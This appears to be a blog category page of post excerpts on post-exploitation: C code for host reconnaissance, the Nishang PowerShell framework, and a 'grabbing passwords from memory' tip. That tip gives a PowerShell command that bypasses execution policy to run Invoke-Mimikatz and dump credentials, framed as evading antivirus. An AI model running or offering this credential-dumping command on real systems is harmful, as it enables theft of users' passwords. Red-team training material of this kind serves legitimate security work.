Category: Post-Exploitation

C/C++, Hacking, Post-Exploitation, RedTeaming

HTTP – Get the external IP address in C

The following code snippets is from Post-recon project. This project is a work in progress. Please visit GitHub for the full source code, in this post I will just point out the most interesting parts. Get Public IP address (HTTP)   {…}   #define PUBLIC_IP_URL "http://ipecho.net/plain"   {…}   int LibCurl::GetPublicIPv4Address(char **ip, const char *userAgent, …

C/C++, Hacking, Post-Exploitation, Programming

Generating a unique machine id

The following code snippets is from Post-recon project. This project is a work in progress. You can check Github for the full source code, here I will just point out the most interesting parts. Current source code Generate computer unique ID Architecture Windows OS version Cpu Gpu is admin? MotherBoard Chassis Type Username PC name …

Penetration Testing, Post-Exploitation

Grabbing Passwords from Memory

* Using Powershell we can bypass AVs easier than using mimikatz.exe which normally is blocked from AVs. * Upload Invoke-Mimikatz.ps1 (part of Nishang Framework) to your target. * Execute remotely: powershell.exe -ExecutionPolicy Bypass -NonInteractive -Command "Import-Module .\Invoke-Mimikatz.ps1; Invoke-Mimikatz"powershell.exe -ExecutionPolicy Bypass -NonInteractive -Command "Import-Module .\Invoke-Mimikatz.ps1; Invoke-Mimikatz"

Penetration Testing, Post-Exploitation

PowerShell for offensive security

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. Usage Import all the scripts in the current PowerShell session. PS C:\nishang> Import-Module .\nishang.psm1PS C:\nishang> Import-Module .\nishang.psm1 Use the individual scripts with dot …